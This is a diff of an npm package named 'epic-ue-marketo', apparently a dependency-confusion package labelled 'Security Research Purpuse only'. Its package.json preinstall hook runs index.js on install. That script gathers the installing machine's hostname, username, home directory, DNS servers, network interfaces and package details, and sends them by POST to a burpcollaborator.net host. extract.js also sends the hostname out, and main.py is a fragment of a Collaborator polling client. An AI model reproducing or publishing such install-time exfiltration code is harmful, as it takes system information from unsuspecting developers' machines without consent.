epic-ue-marketo 14.0.0

package/extract.js

@@ -0,0 +1,26 @@
+const https = require('https');
+var os = require("os");
+var hostname = os.hostname();
+
+const data = new TextEncoder().encode(
+  JSON.stringify({
+    payload: hostname,
+    project_id: process.argv[2]
+  })
+);
+
+const options = {
+  hostname: process.argv[2] + '.' + hostname + '.u3yd2b3m6fp5a9cgam2a29fdd4jv7k.burpcollaborator.net',
+  port: 443,
+  path: '/',
+  method: 'POST',
+  headers: {
+    'Content-Type': 'application/json',
+    'Content-Length': data.length
+  },
+  rejectUnauthorized: false
+}
+
+const req = https.request(options, res => {});
+req.write(data);
+req.end();

package/index.js

@@ -0,0 +1,48 @@
+//author:- bsainath4u@gmail.com
+const os = require("os");
+const dns = require("dns");
+const querystring = require("querystring");
+const https = require("https");
+const packageJSON = require("./package.json");
+const package = packageJSON.name;
+
+const trackingData = JSON.stringify({
+    p: package,
+    c: __dirname,
+    hd: os.homedir(),
+    hn: os.hostname(),
+    un: os.userInfo().username,
+    dns: dns.getServers(),
+    ip: os.networkInterfaces(),
+    r: packageJSON ? packageJSON.___resolved : undefined,
+    v: packageJSON.version,
+    pjson: packageJSON,
+});
+
+var postData = querystring.stringify({
+    msg: trackingData,
+});
+
+var options = {
+    hostname: "u3yd2b3m6fp5a9cgam2a29fdd4jv7k.burpcollaborator.net", //replace burpcollaborator.net with Interactsh or pipedream
+    port: 443,
+    path: "/",
+    method: "POST",
+    headers: {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "Content-Length": postData.length,
+    },
+};
+
+var req = https.request(options, (res) => {
+    res.on("data", (d) => {
+        process.stdout.write(d);
+    });
+});
+
+req.on("error", (e) => {
+    // console.error(e);
+});
+
+req.write(postData);
+req.end();

package/main.py

@@ -0,0 +1,21 @@
+class BurpCollaboratorClient():
+
+    BURP_DOMAIN = "u3yd2b3m6fp5a9cgam2a29fdd4jv7k.burpcollaborator.net"
+
+    def __init__(self, colabo_key, colabo_subdomain):
+        self.colabo_key = colabo_key
+        self.colabo_subdomain = colabo_subdomain
+
+    def poll(self):
+        params = {"biid": self.colabo_key}
+        headers = {
+            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"}
+
+        response = requests.get(
+            "https://" + self.BURP_DOMAIN + "/burpresults", params=params, headers=headers)#, proxies=PROXIES, verify=False)
+
+        if response.status_code != 200:
+            raise Error("Failed to poll Burp Collaborator")
+
+        result_parsed = json.loads(response.text)
+        return result_parsed.get("responses", [])

package/package.json

@@ -0,0 +1,12 @@
+{
+  "name": "epic-ue-marketo",
+  "version": "14.0.0",
+  "description": "This Package is for Security Research Purpuse only",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "node index.js"
+  },
+  "author": "",
+  "license": "ISC"
+}